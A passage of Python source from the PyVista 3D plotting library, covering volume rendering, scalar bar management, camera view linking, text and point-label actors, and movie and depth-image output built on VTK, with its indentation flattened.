shade=shade, diffuse=diffuse, specular=specular,
specular_power=specular_power)
actors.append(a)
return actors
if not isinstance(volume, pyvista.UniformGrid):
raise TypeError(f'Type {type(volume)} not supported for volume rendering at this time. Use `pyvista.UniformGrid`.')
if opacity_unit_distance is None:
opacity_unit_distance = volume.length / (np.mean(volume.dimensions) - 1)
if scalars is None:
# Make sure scalars components are not vectors/tuples
scalars = volume.active_scalars
# Don't allow plotting of string arrays by default
if scalars is not None and np.issubdtype(scalars.dtype, np.number):
if stitle is None:
stitle = volume.active_scalars_info[1]
else:
raise ValueError('No scalars to use for volume rendering.')
elif isinstance(scalars, str):
pass
##############
title = 'Data' if stitle is None else stitle
if isinstance(scalars, str):
title = scalars
scalars = get_array(volume, scalars,
preference=preference, err=True)
if stitle is None:
stitle = title
if not isinstance(scalars, np.ndarray):
scalars = np.asarray(scalars)
if not np.issubdtype(scalars.dtype, np.number):
raise TypeError('Non-numeric scalars are currently not supported for volume rendering.')
if scalars.ndim != 1:
scalars = scalars.ravel()
if scalars.dtype == np.bool_ or scalars.dtype == np.uint8:
scalars = scalars.astype(np.float_)
# Define mapper, volume, and add the correct properties
mappers = {
'fixed_point': vtk.vtkFixedPointVolumeRayCastMapper,
'gpu': vtk.vtkGPUVolumeRayCastMapper,
'open_gl': vtk.vtkOpenGLGPUVolumeRayCastMapper,
'smart': vtk.vtkSmartVolumeMapper,
}
if not isinstance(mapper, str) or mapper not in mappers.keys():
raise TypeError(f"Mapper ({mapper}) unknown. Available volume mappers include: {', '.join(mappers.keys())}")
self.mapper = make_mapper(mappers[mapper])
# Scalars interpolation approach
if scalars.shape[0] == volume.n_points:
volume._add_point_array(scalars, title, True)
self.mapper.SetScalarModeToUsePointData()
elif scalars.shape[0] == volume.n_cells:
volume._add_cell_array(scalars, title, True)
self.mapper.SetScalarModeToUseCellData()
else:
raise_not_matching(scalars, volume)
# Set scalars range
if clim is None:
clim = [np.nanmin(scalars), np.nanmax(scalars)]
elif isinstance(clim, float) or isinstance(clim, int):
clim = [-clim, clim]
###############
scalars = scalars.astype(np.float_)
with np.errstate(invalid='ignore'):
idxs0 = scalars < clim[0]
idxs1 = scalars > clim[1]
scalars[idxs0] = clim[0]
scalars[idxs1] = clim[1]
scalars = ((scalars - np.nanmin(scalars)) / (np.nanmax(scalars) - np.nanmin(scalars))) * 255
# scalars = scalars.astype(np.uint8)
volume[title] = scalars
self.mapper.scalar_range = clim
# Set colormap and build lookup table
table = vtk.vtkLookupTable()
# table.SetNanColor(nan_color) # NaN's are chopped out with current implementation
# above/below colors not supported with volume rendering
if isinstance(annotations, dict):
for val, anno in annotations.items():
table.SetAnnotation(float(val), str(anno))
if cmap is None: # Set default map if matplotlib is available
if has_matplotlib:
cmap = rcParams['cmap']
if cmap is not None:
if not has_matplotlib:
raise ImportError('Please install matplotlib for volume rendering.')
cmap = get_cmap_safe(cmap)
if categories:
if categories is True:
n_colors = len(np.unique(scalars))
elif isinstance(categories, int):
n_colors = categories
if flip_scalars:
cmap = cmap.reversed()
color_tf = vtk.vtkColorTransferFunction()
for ii in range(n_colors):
color_tf.AddRGBPoint(ii, *cmap(ii)[:-1])
# Set opacities
if isinstance(opacity, (float, int)):
opacity_values = [opacity] * n_colors
elif isinstance(opacity, str):
opacity_values = pyvista.opacity_transfer_function(opacity, n_colors)
elif isinstance(opacity, (np.ndarray, list, tuple)):
opacity = np.array(opacity)
opacity_values = opacity_transfer_function(opacity, n_colors)
opacity_tf = vtk.vtkPiecewiseFunction()
for ii in range(n_colors):
opacity_tf.AddPoint(ii, opacity_values[ii] / n_colors)
# Now put color tf and opacity tf into a lookup table for the scalar bar
table.SetNumberOfTableValues(n_colors)
lut = cmap(np.array(range(n_colors))) * 255
lut[:,3] = opacity_values
lut = lut.astype(np.uint8)
table.SetTable(VN.numpy_to_vtk(lut))
table.SetRange(*clim)
self.mapper.lookup_table = table
self.mapper.SetInputData(volume)
blending = blending.lower()
if blending in ['additive', 'add', 'sum']:
self.mapper.SetBlendModeToAdditive()
elif blending in ['average', 'avg', 'average_intensity']:
self.mapper.SetBlendModeToAverageIntensity()
elif blending in ['composite', 'comp']:
self.mapper.SetBlendModeToComposite()
elif blending in ['maximum', 'max', 'maximum_intensity']:
self.mapper.SetBlendModeToMaximumIntensity()
elif blending in ['minimum', 'min', 'minimum_intensity']:
self.mapper.SetBlendModeToMinimumIntensity()
else:
raise ValueError(f'Blending mode \'{blending}\' invalid. ' +
'Please choose one ' + 'of \'additive\', '
'\'composite\', \'minimum\' or ' + '\'maximum\'.')
self.mapper.Update()
self.volume = vtk.vtkVolume()
self.volume.SetMapper(self.mapper)
prop = vtk.vtkVolumeProperty()
prop.SetColor(color_tf)
prop.SetScalarOpacity(opacity_tf)
prop.SetAmbient(ambient)
prop.SetScalarOpacityUnitDistance(opacity_unit_distance)
prop.SetShade(shade)
prop.SetDiffuse(diffuse)
prop.SetSpecular(specular)
prop.SetSpecularPower(specular_power)
self.volume.SetProperty(prop)
actor, prop = self.add_actor(self.volume, reset_camera=reset_camera,
name=name, culling=culling,
pickable=pickable)
# Add scalar bar
if stitle is not None and show_scalar_bar:
self.add_scalar_bar(stitle, **scalar_bar_args)
self.renderer.Modified()
return actor
def update_scalar_bar_range(self, clim, name=None):
"""Update the value range of the active or named scalar bar.
Parameters
----------
2 item list
The new range of scalar bar. Example: ``[-1, 2]``.
name : str, optional
The title of the scalar bar to update
"""
if isinstance(clim, float) or isinstance(clim, int):
clim = [-clim, clim]
if len(clim) != 2:
raise TypeError('clim argument must be a length 2 iterable of values: (min, max).')
if name is None:
if not hasattr(self, 'mapper'):
raise AttributeError('This plotter does not have an active mapper.')
self.mapper.scalar_range = clim
return
# Use the name to find the desired actor
def update_mapper(mapper_helper):
mapper_helper.scalar_range = clim
return
try:
for mh in self._scalar_bar_mappers[name]:
update_mapper(mh)
except KeyError:
raise KeyError('Name ({}) not valid/not found in this plotter.')
return
def clear(self):
"""Clear plot by removing all actors and properties."""
for renderer in self.renderers:
renderer.clear()
self._shadow_renderer.clear()
for renderer in self._background_renderers:
if renderer is not None:
renderer.clear()
self._scalar_bar_slots = set(range(MAX_N_COLOR_BARS))
self._scalar_bar_slot_lookup = {}
self._scalar_bar_ranges = {}
self._scalar_bar_mappers = {}
self._scalar_bar_actors = {}
self._scalar_bar_widgets = {}
self.mesh = None
def link_views(self, views=0):
"""Link the views' cameras.
Parameters
----------
views : int | tuple or list
If ``views`` is int, link the views to the given view
index or if ``views`` is a tuple or a list, link the given
views cameras.
"""
if isinstance(views, (int, np.integer)):
for renderer in self.renderers:
renderer.camera = self.renderers[views].camera
return
views = np.asarray(views)
if np.issubdtype(views.dtype, np.integer):
for view_index in views:
self.renderers[view_index].camera = \
self.renderers[views[0]].camera
else:
raise TypeError('Expected type is int, list or tuple:'
f'{type(views)} is given')
def unlink_views(self, views=None):
"""Unlink the views' cameras.
Parameters
----------
views : None | int | tuple or list
If ``views`` is None unlink all the views, if ``views``
is int unlink the selected view's camera or if ``views``
is a tuple or a list, unlink the given views cameras.
"""
if views is None:
for renderer in self.renderers:
renderer.camera = vtk.vtkCamera()
renderer.reset_camera()
elif isinstance(views, int):
self.renderers[views].camera = vtk.vtkCamera()
self.renderers[views].reset_camera()
elif isinstance(views, collections.abc.Iterable):
for view_index in views:
self.renderers[view_index].camera = vtk.vtkCamera()
self.renderers[view_index].reset_camera()
else:
raise TypeError('Expected type is None, int, list or tuple:'
f'{type(views)} is given')
def add_scalar_bar(self, title=None, n_labels=5, italic=False,
bold=False, title_font_size=None,
label_font_size=None, color=None,
font_family=None, shadow=False, mapper=None,
width=None, height=None, position_x=None,
position_y=None, vertical=None,
interactive=None, fmt=None, use_opacity=True,
outline=False, nan_annotation=False,
below_label=None, above_label=None,
background_color=None, n_colors=None, fill=False):
"""Create scalar bar using the ranges as set by the last input mesh.
Parameters
----------
title : string, optional
Title of the scalar bar. Default None
n_labels : int, optional
Number of labels to use for the scalar bar.
italic : bool, optional
Italicises title and bar labels. Default False.
bold : bool, optional
Bolds title and bar labels. Default True
title_font_size : float, optional
Sets the size of the title font. Defaults to None and is sized
automatically.
label_font_size : float, optional
Sets the size of the title font. Defaults to None and is sized
automatically.
color : string or 3 item list, optional, defaults to white
Either a string, rgb list, or hex color string. For example:
color='white'
color='w'
color=[1, 1, 1]
color='#FFFFFF'
font_family : string, optional
Font family. Must be either courier, times, or arial.
shadow : bool, optional
Adds a black shadow to the text. Defaults to False
width : float, optional
The percentage (0 to 1) width of the window for the colorbar
height : float, optional
The percentage (0 to 1) height of the window for the colorbar
position_x : float, optional
The percentage (0 to 1) along the windows's horizontal
direction to place the bottom left corner of the colorbar
position_y : float, optional
The percentage (0 to 1) along the windows's vertical
direction to place the bottom left corner of the colorbar
interactive : bool, optional
Use a widget to control the size and location of the scalar bar.
use_opacity : bool, optional
Optionally display the opacity mapping on the scalar bar
outline : bool, optional
Optionally outline the scalar bar to make opacity mappings more
obvious.
nan_annotation : bool, optional
Annotate the NaN color
below_label : str, optional
String annotation for values below the scalars range
above_label : str, optional
String annotation for values above the scalars range
background_color : array, optional
The color used for the background in RGB format.
n_colors : int, optional
The maximum number of color displayed in the scalar bar.
fill : bool
Draw a filled box behind the scalar bar with the ``background_color``
Notes
-----
Setting title_font_size, or label_font_size disables automatic font
sizing for both the title and label.
"""
if interactive is None:
interactive = rcParams['interactive']
if font_family is None:
font_family = rcParams['font']['family']
if label_font_size is None:
label_font_size = rcParams['font']['label_size']
if title_font_size is None:
title_font_size = rcParams['font']['title_size']
if color is None:
color = rcParams['font']['color']
if fmt is None:
fmt = rcParams['font']['fmt']
if vertical is None:
if rcParams['colorbar_orientation'].lower() == 'vertical':
vertical = True
# Automatically choose size if not specified
if width is None:
if vertical:
width = rcParams['colorbar_vertical']['width']
else:
width = rcParams['colorbar_horizontal']['width']
if height is None:
if vertical:
height = rcParams['colorbar_vertical']['height']
else:
height = rcParams['colorbar_horizontal']['height']
# check if maper exists
if mapper is None:
if not hasattr(self, 'mapper') or self.mapper is None:
raise AttributeError('Mapper does not exist. '
'Add a mesh with scalars first.')
mapper = self.mapper
if title:
# Check that this data hasn't already been plotted
if title in list(self._scalar_bar_ranges.keys()):
clim = list(self._scalar_bar_ranges[title])
newrng = mapper.scalar_range
oldmappers = self._scalar_bar_mappers[title]
# get max for range and reset everything
if newrng[0] < clim[0]:
clim[0] = newrng[0]
if newrng[1] > clim[1]:
clim[1] = newrng[1]
for mh in oldmappers:
mh.scalar_range = clim[0], clim[1]
mapper.scalar_range = clim[0], clim[1]
self._scalar_bar_mappers[title].append(mapper)
self._scalar_bar_ranges[title] = clim
# Color bar already present and ready to be used so returning
return
# Automatically choose location if not specified
if position_x is None or position_y is None:
try:
slot = min(self._scalar_bar_slots)
self._scalar_bar_slots.remove(slot)
self._scalar_bar_slot_lookup[title] = slot
except:
raise RuntimeError('Maximum number of color bars reached.')
if position_x is None:
if vertical:
position_x = rcParams['colorbar_vertical']['position_x']
position_x -= slot * (width + 0.2 * width)
else:
position_x = rcParams['colorbar_horizontal']['position_x']
if position_y is None:
if vertical:
position_y = rcParams['colorbar_vertical']['position_y']
else:
position_y = rcParams['colorbar_horizontal']['position_y']
position_y += slot * height
# Adjust to make sure on the screen
if position_x + width > 1:
position_x -= width
if position_y + height > 1:
position_y -= height
# parse color
color = parse_color(color)
# Create scalar bar
self.scalar_bar = vtk.vtkScalarBarActor()
if background_color is not None:
background_color = parse_color(background_color, opacity=1.0)
background_color = np.array(background_color) * 255
self.scalar_bar.GetBackgroundProperty().SetColor(background_color[0:3])
if fill:
self.scalar_bar.DrawBackgroundOn()
lut = vtk.vtkLookupTable()
lut.DeepCopy(mapper.lookup_table)
ctable = vtk_to_numpy(lut.GetTable())
alphas = ctable[:, -1][:, np.newaxis] / 255.
use_table = ctable.copy()
use_table[:, -1] = 255.
ctable = (use_table * alphas) + background_color * (1 - alphas)
lut.SetTable(numpy_to_vtk(ctable, array_type=vtk.VTK_UNSIGNED_CHAR))
else:
lut = mapper.lookup_table
self.scalar_bar.SetLookupTable(lut)
if n_colors is not None:
self.scalar_bar.SetMaximumNumberOfColors(n_colors)
if n_labels < 1:
self.scalar_bar.DrawTickLabelsOff()
else:
self.scalar_bar.DrawTickLabelsOn()
self.scalar_bar.SetNumberOfLabels(n_labels)
if nan_annotation:
self.scalar_bar.DrawNanAnnotationOn()
if above_label:
self.scalar_bar.DrawAboveRangeSwatchOn()
self.scalar_bar.SetAboveRangeAnnotation(above_label)
if below_label:
self.scalar_bar.DrawBelowRangeSwatchOn()
self.scalar_bar.SetBelowRangeAnnotation(below_label)
# edit the size of the colorbar
self.scalar_bar.SetHeight(height)
self.scalar_bar.SetWidth(width)
self.scalar_bar.SetPosition(position_x, position_y)
if fmt is not None:
self.scalar_bar.SetLabelFormat(fmt)
if vertical:
self.scalar_bar.SetOrientationToVertical()
else:
self.scalar_bar.SetOrientationToHorizontal()
if label_font_size is not None or title_font_size is not None:
self.scalar_bar.UnconstrainedFontSizeOn()
self.scalar_bar.AnnotationTextScalingOn()
label_text = self.scalar_bar.GetLabelTextProperty()
anno_text = self.scalar_bar.GetAnnotationTextProperty()
label_text.SetColor(color)
anno_text.SetColor(color)
label_text.SetShadow(shadow)
anno_text.SetShadow(shadow)
# Set font
label_text.SetFontFamily(parse_font_family(font_family))
anno_text.SetFontFamily(parse_font_family(font_family))
label_text.SetItalic(italic)
anno_text.SetItalic(italic)
label_text.SetBold(bold)
anno_text.SetBold(bold)
if label_font_size:
label_text.SetFontSize(label_font_size)
anno_text.SetFontSize(label_font_size)
# Set properties
if title:
clim = mapper.scalar_range
self._scalar_bar_ranges[title] = clim
self._scalar_bar_mappers[title] = [mapper]
self.scalar_bar.SetTitle(title)
title_text = self.scalar_bar.GetTitleTextProperty()
title_text.SetJustificationToCentered()
title_text.SetItalic(italic)
title_text.SetBold(bold)
title_text.SetShadow(shadow)
if title_font_size:
title_text.SetFontSize(title_font_size)
# Set font
title_text.SetFontFamily(parse_font_family(font_family))
# set color
title_text.SetColor(color)
self._scalar_bar_actors[title] = self.scalar_bar
if interactive is None:
interactive = rcParams['interactive']
if self.shape != (1, 1):
interactive = False
elif interactive and self.shape != (1, 1):
raise ValueError('Interactive scalar bars disabled for multi-renderer plots')
if interactive and hasattr(self, 'iren'):
self.scalar_widget = vtk.vtkScalarBarWidget()
self.scalar_widget.SetScalarBarActor(self.scalar_bar)
self.scalar_widget.SetInteractor(self.iren)
self.scalar_widget.SetEnabled(1)
rep = self.scalar_widget.GetRepresentation()
# self.scalar_widget.On()
if vertical is True or vertical is None:
rep.SetOrientation(1) # 0 = Horizontal, 1 = Vertical
else:
rep.SetOrientation(0) # 0 = Horizontal, 1 = Vertical
self._scalar_bar_widgets[title] = self.scalar_widget
if use_opacity:
self.scalar_bar.SetUseOpacity(True)
if outline:
self.scalar_bar.SetDrawFrame(True)
frame_prop = self.scalar_bar.GetFrameProperty()
frame_prop.SetColor(color)
else:
self.scalar_bar.SetDrawFrame(False)
self.add_actor(self.scalar_bar, reset_camera=False, pickable=False)
return self.scalar_bar # return the actor
def update_scalars(self, scalars, mesh=None, render=True):
"""Update scalars of an object in the plotter.
Parameters
----------
scalars : np.ndarray
Scalars to replace existing scalars.
mesh : vtk.PolyData or vtk.UnstructuredGrid, optional
Object that has already been added to the Plotter. If
None, uses last added mesh.
render : bool, optional
Forces an update to the render window. Default True.
"""
if mesh is None:
mesh = self.mesh
if isinstance(mesh, (collections.abc.Iterable, pyvista.MultiBlock)):
# Recursive if need to update scalars on many meshes
for m in mesh:
self.update_scalars(scalars, mesh=m, render=False)
if render:
self.render()
return
if isinstance(scalars, str):
# Grab scalars array if name given
scalars = get_array(mesh, scalars)
if scalars is None:
if render:
self.render()
return
if scalars.shape[0] == mesh.GetNumberOfPoints():
data = mesh.GetPointData()
elif scalars.shape[0] == mesh.GetNumberOfCells():
data = mesh.GetCellData()
else:
raise_not_matching(scalars, mesh)
vtk_scalars = data.GetScalars()
if vtk_scalars is None:
raise ValueError('No active scalars')
s = convert_array(vtk_scalars)
s[:] = scalars
data.Modified()
try:
# Why are the points updated here? Not all datasets have points
# and only the scalars array is modified by this function...
mesh.GetPoints().Modified()
except:
pass
if render:
self.render()
def update_coordinates(self, points, mesh=None, render=True):
"""Update the points of an object in the plotter.
Parameters
----------
points : np.ndarray
Points to replace existing points.
mesh : vtk.PolyData or vtk.UnstructuredGrid, optional
Object that has already been added to the Plotter. If
None, uses last added mesh.
render : bool, optional
Forces an update to the render window. Default True.
"""
if mesh is None:
mesh = self.mesh
mesh.points = points
if render:
self.render()
def _clear_ren_win(self):
"""Clear the render window."""
if hasattr(self, 'ren_win'):
self.ren_win.Finalize()
del self.ren_win
def close(self):
"""Close the render window."""
# must close out widgets first
super().close()
# Renderer has an axes widget, so close it
for renderer in self.renderers:
renderer.close()
self._shadow_renderer.close()
# Grab screenshots of last render
if self._store_image:
self.last_image = self.screenshot(None, return_img=True)
self.last_image_depth = self.get_image_depth()
if hasattr(self, 'scalar_widget'):
del self.scalar_widget
# reset scalar bar stuff
self.clear()
self._clear_ren_win()
self._style_class = None
if hasattr(self, 'iren'):
# self.iren.RemoveAllObservers()
for obs in self._observers.values():
self.iren.RemoveObservers(obs)
del self._observers
self.iren.TerminateApp()
del self.iren
if hasattr(self, 'textActor'):
del self.textActor
# end movie
if hasattr(self, 'mwriter'):
try:
self.mwriter.close()
except BaseException:
pass
# this helps managing closed plotters
self._closed = True
def deep_clean(self):
"""Clean the plotter of the memory."""
for renderer in self.renderers:
renderer.deep_clean()
self._shadow_renderer.deep_clean()
for renderer in self._background_renderers:
if renderer is not None:
renderer.deep_clean()
# Do not remove the renderers on the clean
self.mesh = None
self.mapper = None
self.volume = None
self.textactor = None
def add_text(self, text, position='upper_left', font_size=18, color=None,
font=None, shadow=False, name=None, viewport=False):
"""Add text to plot object in the top left corner by default.
Parameters
----------
text : str
The text to add the rendering
position : str, tuple(float)
Position to place the bottom left corner of the text box.
If tuple is used, the position of the text uses the pixel
coordinate system (default). In this case,
it returns a more general `vtkOpenGLTextActor`.
If string name is used, it returns a `vtkCornerAnnotation`
object normally used for fixed labels (like title or xlabel).
Default is to find the top left corner of the rendering window
and place text box up there. Available position: ``'lower_left'``,
``'lower_right'``, ``'upper_left'``, ``'upper_right'``,
``'lower_edge'``, ``'upper_edge'``, ``'right_edge'``, and
``'left_edge'``
font : string, optional
Font name may be courier, times, or arial
shadow : bool, optional
Adds a black shadow to the text. Defaults to False
name : str, optional
The name for the added actor so that it can be easily updated.
If an actor of this name already exists in the rendering window, it
will be replaced by the new actor.
viewport: bool
If True and position is a tuple of float, uses
the normalized viewport coordinate system (values between 0.0
and 1.0 and support for HiDPI).
Return
------
textActor : vtk.vtkTextActor
Text actor added to plot
"""
if font is None:
font = rcParams['font']['family']
if font_size is None:
font_size = rcParams['font']['size']
if color is None:
color = rcParams['font']['color']
if position is None:
# Set the position of the text to the top left corner
window_size = self.window_size
x = (window_size[0] * 0.02) / self.shape[0]
y = (window_size[1] * 0.85) / self.shape[0]
position = [x, y]
corner_mappings = {
'lower_left': vtk.vtkCornerAnnotation.LowerLeft,
'lower_right': vtk.vtkCornerAnnotation.LowerRight,
'upper_left': vtk.vtkCornerAnnotation.UpperLeft,
'upper_right': vtk.vtkCornerAnnotation.UpperRight,
'lower_edge': vtk.vtkCornerAnnotation.LowerEdge,
'upper_edge': vtk.vtkCornerAnnotation.UpperEdge,
'left_edge': vtk.vtkCornerAnnotation.LeftEdge,
'right_edge': vtk.vtkCornerAnnotation.RightEdge,
}
corner_mappings['ll'] = corner_mappings['lower_left']
corner_mappings['lr'] = corner_mappings['lower_right']
corner_mappings['ul'] = corner_mappings['upper_left']
corner_mappings['ur'] = corner_mappings['upper_right']
corner_mappings['top'] = corner_mappings['upper_edge']
corner_mappings['bottom'] = corner_mappings['lower_edge']
corner_mappings['right'] = corner_mappings['right_edge']
corner_mappings['r'] = corner_mappings['right_edge']
corner_mappings['left'] = corner_mappings['left_edge']
corner_mappings['l'] = corner_mappings['left_edge']
if isinstance(position, (int, str, bool)):
if isinstance(position, str):
position = corner_mappings[position]
elif position is True:
position = corner_mappings['upper_left']
self.textActor = vtk.vtkCornerAnnotation()
# This is how you set the font size with this actor
self.textActor.SetLinearFontScaleFactor(font_size // 2)
self.textActor.SetText(position, text)
else:
self.textActor = vtk.vtkTextActor()
self.textActor.SetInput(text)
self.textActor.SetPosition(position)
if viewport:
self.textActor.GetActualPositionCoordinate().SetCoordinateSystemToNormalizedViewport()
self.textActor.GetActualPosition2Coordinate().SetCoordinateSystemToNormalizedViewport()
self.textActor.GetTextProperty().SetFontSize(int(font_size * 2))
self.textActor.GetTextProperty().SetColor(parse_color(color))
self.textActor.GetTextProperty().SetFontFamily(FONT_KEYS[font])
self.textActor.GetTextProperty().SetShadow(shadow)
self.add_actor(self.textActor, reset_camera=False, name=name, pickable=False)
return self.textActor
def open_movie(self, filename, framerate=24):
"""Establish a connection to the ffmpeg writer.
Parameters
----------
filename : str
Filename of the movie to open. Filename should end in mp4,
but other filetypes may be supported. See "imagio.get_writer"
framerate : int, optional
Frames per second.
"""
if isinstance(pyvista.FIGURE_PATH, str) and not os.path.isabs(filename):
filename = os.path.join(pyvista.FIGURE_PATH, filename)
self.mwriter = imageio.get_writer(filename, fps=framerate)
def open_gif(self, filename):
"""Open a gif file.
Parameters
----------
filename : str
Filename of the gif to open. Filename must end in gif.
"""
if filename[-3:] != 'gif':
raise ValueError('Unsupported filetype. Must end in .gif')
if isinstance(pyvista.FIGURE_PATH, str) and not os.path.isabs(filename):
filename = os.path.join(pyvista.FIGURE_PATH, filename)
self._gif_filename = os.path.abspath(filename)
self.mwriter = imageio.get_writer(filename, mode='I')
def write_frame(self):
"""Write a single frame to the movie file."""
if not hasattr(self, 'mwriter'):
raise RuntimeError('This plotter has not opened a movie or GIF file.')
self.mwriter.append_data(self.image)
def _run_image_filter(self, ifilter):
# Update filter and grab pixels
ifilter.Modified()
ifilter.Update()
image = pyvista.wrap(ifilter.GetOutput())
img_size = image.dimensions
img_array = pyvista.utilities.point_array(image, 'ImageScalars')
# Reshape and write
tgt_size = (img_size[1], img_size[0], -1)
return img_array.reshape(tgt_size)[::-1]
def get_image_depth(self,
fill_value=np.nan,
reset_camera_clipping_range=True):
"""Return a depth image representing current render window.
Parameters
----------
fill_value : float
Fill value for points in image that don't include objects in scene.
To not use a fill value, pass ``None``.
reset_camera_clipping_range : bool
Reset the camera clipping range to include data in view?
Return
------
image_depth : numpy.ndarray
Image of depth values from camera orthogonal to image plane
Notes
-----
Values in image_depth are negative to adhere to a
right-handed coordinate system.
"""
if not hasattr(self, 'ren_win') and hasattr(self, 'last_image_depth'):
zval = self.last_image_depth.copy()
if fill_value is not None:
zval[self._image_depth_null] = fill_value
return zval
# Ensure points in view are within clipping range of renderer?
if reset_camera_clipping_range:
self.renderer.ResetCameraClippingRange()
# Get the z-buffer image
ifilter = vtk.vtkWindowToImageFilter()
ifilter.SetInput(self.ren_win)
ifilter.ReadFrontBufferOff()
ifilter.SetInputBufferTypeToZBuffer()
zbuff = self._run_image_filter(ifilter)[:, :, 0]
# Convert z-buffer values to depth from camera
with warnings.catch_warnings():
warnings.filterwarnings('ignore')
near, far = self.camera.GetClippingRange()
if self.camera.GetParallelProjection():
zval = (zbuff - near) / (far - near)
else:
zval = 2 * near * far / ((zbuff - 0.5) * 2 * (far - near) - near - far)
# Consider image values outside clipping range as nans
args = np.logical_or(zval < -far, np.isclose(zval, -far))
self._image_depth_null = args
if fill_value is not None:
zval[args] = fill_value
return zval
def add_lines(self, lines, color=(1, 1, 1), width=5, label=None, name=None):
"""Add lines to the plotting object.
Parameters
----------
lines : np.ndarray or pyvista.PolyData
Points representing line segments. For example, two line segments
would be represented as:
np.array([[0, 0, 0], [1, 0, 0], [1, 0, 0], [1, 1, 0]])
color : string or 3 item list, optional, defaults to white
Either a string, rgb list, or hex color string. For example:
color='white'
color='w'
color=[1, 1, 1]
color='#FFFFFF'
width : float, optional
Thickness of lines
name : str, optional
The name for the added actor so that it can be easily updated.
If an actor of this name already exists in the rendering window, it
will be replaced by the new actor.
Return
------
actor : vtk.vtkActor
Lines actor.
"""
if not isinstance(lines, np.ndarray):
raise TypeError('Input should be an array of point segments')
lines = pyvista.lines_from_points(lines)
# Create mapper and add lines
mapper = vtk.vtkDataSetMapper()
mapper.SetInputData(lines)
rgb_color = parse_color(color)
# legend label
if label:
if not isinstance(label, str):
raise TypeError('Label must be a string')
self._labels.append([lines, label, rgb_color])
# Create actor
actor = vtk.vtkActor()
actor.SetMapper(mapper)
actor.GetProperty().SetLineWidth(width)
actor.GetProperty().EdgeVisibilityOn()
actor.GetProperty().SetEdgeColor(rgb_color)
actor.GetProperty().SetColor(rgb_color)
actor.GetProperty().LightingOff()
# Add to renderer
self.add_actor(actor, reset_camera=False, name=name, pickable=False)
return actor
def remove_scalar_bar(self):
"""Remove the scalar bar."""
if hasattr(self, 'scalar_bar'):
self.remove_actor(self.scalar_bar, reset_camera=False)
def add_point_labels(self, points, labels, italic=False, bold=True,
font_size=None, text_color=None,
font_family=None, shadow=False,
show_points=True, point_color=None, point_size=5,
name=None, shape_color='grey', shape='rounded_rect',
fill_shape=True, margin=3, shape_opacity=1.0,
pickable=False, render_points_as_spheres=False,
tolerance=0.001, reset_camera=None, always_visible=False):
"""Create a point actor with one label from list labels assigned to each point.
Parameters
----------
points : np.ndarray or pyvista.Common
n x 3 numpy array of points or pyvista dataset with points
labels : list or str
List of labels. Must be the same length as points. If a string name
is given with a pyvista.Common input for points, then these are fetched.
italic : bool, optional
Italicises title and bar labels. Default False.
bold : bool, optional
Bolds title and bar labels. Default True
font_size : float, optional
Sets the size of the title font. Defaults to 16.
text_color : string or 3 item list, optional
Color of text. Either a string, rgb list, or hex color string.
text_color='white'
text_color='w'
text_color=[1, 1, 1]
text_color='#FFFFFF'
font_family : string, optional
Font family. Must be either courier, times, or arial.
shadow : bool, optional
Adds a black shadow to the text. Defaults to False
show_points : bool, optional
Controls if points are visible. Default True
point_color : string or 3 item list, optional. Color of points (if visible).
Either a string, rgb list, or hex color string. For example:
text_color='white'
text_color='w'
text_color=[1, 1, 1]
text_color='#FFFFFF'
point_size : float, optional
Size of points (if visible)
name : str, optional
The name for the added actor so that it can be easily updated.
If an actor of this name already exists in the rendering window, it
will be replaced by the new actor.
shape_color : string or 3 item list, optional. Color of points (if visible).
Either a string, rgb list, or hex color string. For example:
shape : str, optional
The string name of the shape to use. Options are ``'rect'`` or
``'rounded_rect'``. If you want no shape, pass ``None``
fill_shape : bool, optional
Fill the shape with the ``shape_color``. Outlines if ``False``.
margin : int, optional
The size of the margin on the label background shape. Default is 3.
shape_opacity : float
The opacity of the shape between zero and one.
tolerance : float
a tolerance to use to determine whether a point label is visible.
A tolerance is usually required because the conversion from world
space to display space during rendering introduces numerical
round-off.
reset_camera : bool, optional
Reset the camera after adding the points to the scene.
always_visible : bool, optional
Skip adding the visibility filter. Default False.
Return
------
labelActor : vtk.vtkActor2D
VTK label actor. Can be used to change properties of the labels.
"""
if font_family is None:
font_family = rcParams['font']['family']
if font_size is None:
font_size = rcParams['font']['size']
if point_color is None:
point_color = rcParams['color']
if text_color is None:
text_color = rcParams['font']['color']
if isinstance(points, (list, tuple)):
points = np.array(points)
if isinstance(points, np.ndarray):
vtkpoints = pyvista.PolyData(points) # Cast to poly data
elif is_pyvista_dataset(points):
vtkpoints = pyvista.PolyData(points.points)
if isinstance(labels, str):
labels = points.point_arrays[labels].astype(str)
else:
raise TypeError(f'Points type not usable: {type(points)}')
if len(vtkpoints.points) != len(labels):
raise ValueError('There must be one label for each point')
if name is None:
name = f'{type(vtkpoints).__name__}({vtkpoints.memory_address})'
vtklabels = vtk.vtkStringArray()
vtklabels.SetName('labels')
for item in labels:
vtklabels.InsertNextValue(str(item))
vtkpoints.GetPointData().AddArray(vtklabels)
# Create hierarchy
hier = vtk.vtkPointSetToLabelHierarchy()
hier.SetLabelArrayName('labels')
if always_visible:
hier.SetInputData(vtkpoints)
else:
# Only show visible points
vis_points = vtk.vtkSelectVisiblePoints()
vis_points.SetInputData(vtkpoints)
vis_points.SetRenderer(self.renderer)
vis_points.SetTolerance(tolerance)
hier.SetInputConnection(vis_points.GetOutputPort())
# create label mapper
labelMapper = vtk.vtkLabelPlacementMapper()
labelMapper.SetInputConnection(hier.GetOutputPort())
if not isinstance(shape, str):
labelMapper.SetShapeToNone()
elif shape.lower() in 'rect':
labelMapper.SetShapeToRect()
elif shape.lower() in 'rounded_rect':
labelMapper.SetShapeToRoundedRect()
else:
raise ValueError(f'Shape ({shape}) not understood')
if fill_shape:
labelMapper.SetStyleToFilled()
else:
labelMapper.SetStyleToOutline()
labelMapper.SetBackgroundColor(parse_color(shape_color))
labelMapper.SetBackgroundOpacity(shape_opacity)
labelMapper.SetMargin(margin)
textprop = hier.GetTextProperty()
textprop.SetItalic(italic)
textprop.SetBold(bold)
textprop.SetFontSize(font_size)
textprop.SetFontFamily(parse_font_family(font_family))
textprop.SetColor(parse_color(text_color))
textprop.SetShadow(shadow)
self.remove_actor(f'{name}-points', reset_camera=False)
self.remove_actor(f'{name}-labels', reset_camera=False)
# add points
if show_points:
style = 'points'
else:
style = 'surface'
self.add_mesh(vtkpoints, style=style, color=point_color,
point_size=point_size, name=f'{name}-points',
pickable=pickable,
render_points_as_spheres=render_points_as_spheres,
reset_camera=reset_camera)
labelActor = vtk.vtkActor2D()
labelActor.SetMapper(labelMapper)
self.add_actor(labelActor, reset_camera=False,
name=f'{name}-labels', pickable=False)
return labelActor
